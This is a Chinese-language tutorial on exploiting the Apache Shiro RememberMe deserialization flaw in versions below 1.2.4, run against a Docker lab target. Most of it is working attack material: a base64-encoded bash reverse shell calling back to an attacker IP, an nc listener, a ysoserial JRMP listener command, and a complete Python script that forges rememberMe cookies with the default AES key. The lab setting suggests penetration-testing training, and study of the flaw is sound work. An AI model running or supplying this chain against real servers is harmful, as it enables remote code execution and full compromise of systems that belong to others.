1.漏洞原理
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
那么,Payload产生的过程:命令=》序列化=》AES加密=》base64编码=》RememberMe Cookie值
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么久很容易就知道密钥,payload构造起来也是十分简单。
1.1影响版本:Apache Shiro < 1.2.4
1.2特征判断:返回包中包含rememberMe=deleteMe字段
2.漏洞发现
2.1环境搭建
获取docker镜像
docker pull medicean/vulapps:s_shiro_1
启动docker镜像:
docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1
2.2漏洞检测
这里使用一个shiro_exploit工具,检查是否存在默认的key
github项目地址:https://github.com/insightglacier/Shiro_exploit
使用方法:python2 shiro_exploit.py –u 目标机地址及端口
会不停的匹配key值,共22种。通过对靶场的测试我们发现使用红框里的AES密钥,有了key之后有两种利用方式。
3.漏洞利用
3.1利用方式一:反弹shell
3.1.1制作反弹shell代码
监听本地端口
nc –lvp 1234
Java Runtime配合bash编码,在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
得到编码后的结果: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
3.1.2通过ysoserial中JRMP监听模块,监听6666端口并执行反弹shell命令。
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"
3.1.3使用shiro.py生成payload
python shiro.py 192.168.21.129:6666
shiro.py代码如下:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
3.1.4构造数据包,伪造cookie,发送payload
输入任意账号密码,记住选择rememberme选项
将之前生成的payload加入到cookie中发送
nc监听端口,成功反弹
Java监听接口,查看服务器链接情况
